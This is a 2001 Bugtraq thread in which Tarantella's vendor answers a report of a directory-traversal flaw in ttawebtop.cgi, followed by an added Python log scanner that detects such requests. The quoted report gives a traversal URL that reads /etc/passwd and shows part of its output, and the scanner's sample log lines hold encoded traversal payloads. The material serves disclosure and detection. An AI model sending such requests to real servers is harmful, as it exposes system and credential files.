[21102] in bugtraq
Re: SCO Tarantella Remote file read via ttawebtop.cgi
daemon@ATHENA.MIT.EDU (Mike McEwen)
Tue Jun 19 16:10:00 2001
Date: Tue, 19 Jun 2001 15:09:35 +0100
From: Mike McEwen <mikemc@tarantella.com>
To: KF <dotslash@snosoft.com>, BUGTRAQ@securityfocus.com
Message-ID: <20010619150935.A5226@tarantella.com>
In-Reply-To: <3B2E37D0.81D9ED9D@snosoft.com>; from dotslash@snosoft.com on Mon, Jun 18, 2001 at 01:18:08PM -0400
On Monday June 18, KF wrote:
> SCO has been notified of this issue.
>
>
> -------- Original Message --------
> Subject: SCO Tarantella Remote file read via ttawebtop.cgi
> Date: Mon, 18 Jun 2001 13:06:41 -0400
> From: KF <dotslash@snosoft.com>
> To: recon@snosoft.com
>
>
> http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
>
> root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:
> daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm:
> lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync
> shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
> halt:x:7:0:halt:/sbin:/sbin/
> ...
>
>
> No perms to shadow...
>
> http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow
>
>
> File missing
>
> The following file could not be found:
>
>
> /tarantella/../../../../../../../../../../../../../../../etc/shadow
>
> Please give this information to a Tarantella Administrator.
>
> -KF
This problem was introduced in release 3.01 and was caught during a security
audit and was fixed for our last release (Tarantella 3.10).
It is a problem for releases 3.00 and 3.01 only.
To fix this problem, upgrade to 3.10.
Thank you for reporting this problem.
- Mike McEwen
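
For sites still running 3.00 or 3.01, a log check for the request shown in the report. This is an added example, not part of either message and not Tarantella code; it goes slightly beyond the plain ../ form in the report by also unwrapping percent-encoded values. The /tarantella base is taken from the "File missing" error text, and the log lines, client addresses and the index.html value are constructed.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

BASE = "/tarantella"  # assumption: prefix shown in the report's "File missing" error
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (common log format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Jun/2001:13:06:41 -0400] "GET /tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../etc/passwd HTTP/1.0" 200 512',
    '192.0.2.11 - - [18/Jun/2001:13:07:02 -0400] "GET /tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.0" 200 512',
    '198.51.100.7 - - [18/Jun/2001:13:08:15 -0400] "GET /tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=index.html HTTP/1.0" 200 2048',
    '198.51.100.8 - - [18/Jun/2001:13:09:30 -0400] "GET /other.cgi?pg=../../etc/passwd HTTP/1.0" 404 0',
]

def fully_decode(value, max_rounds=5):
    """Percent-decode several times so nested encodings of ../ are unwrapped."""
    for _ in range(max_rounds):
        value = unquote(value)
    return value

def pg_escape_target(url, base=BASE):
    """Return the normalized path if a pg= value leaves base, else None."""
    parts = urlsplit(url)
    if "ttawebtop.cgi" not in parts.path:
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get("pg", []):
        pg = fully_decode(raw).replace("\\", "/")
        # Mirror the concatenation visible in the error message: base + "/" + pg
        resolved = posixpath.normpath(base + "/" + pg)
        if resolved != base and not resolved.startswith(base + "/"):
            return resolved
    return None

def scan_log(lines):
    """Return (client, resolved_path) for each request whose pg escapes BASE."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        target = pg_escape_target(match.group(1)) if match else None
        if target:
            hits.append((line.split()[0], target))
    return hits

if __name__ == "__main__":
    for client, target in scan_log(SAMPLE_LOG):
        print(f"{client} requested pg resolving to {target}")
```

The same normalize-then-compare test in pg_escape_target is what a handler would apply before opening the file; matching on the literal string "../" alone misses encoded forms.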